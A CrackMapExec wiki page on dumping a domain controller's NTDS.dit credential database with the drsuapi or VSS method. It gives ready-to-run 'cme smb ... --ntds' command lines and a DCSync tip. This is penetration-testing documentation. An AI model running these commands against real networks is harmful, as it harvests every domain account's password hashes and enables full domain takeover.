🔱
🔱
🔱
🔱
CrackMapExec ~ CME WIKI
@mpgn_x64
Search
K
Links
Comment on page

Dump NTDS.dit

Dump the NTDS.dit from target DC using methods from secretsdump.py

Requires Domain Admin or Local Admin Priviledges on target Domain Controller
2 methods are available:
(default) drsuapi - Uses drsuapi RPC interface create a handle, trigger replication, and combined with
additional drsuapi calls to convert the resultant linked-lists into readable format
vss - Uses the Volume Shadow copy Service
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
You can also DCSYNC with the computer account of the DC
Remember to play this music everytime you got DA
Previous
Dump LSA
Next
Dump LSASS
Last modified 2mo ago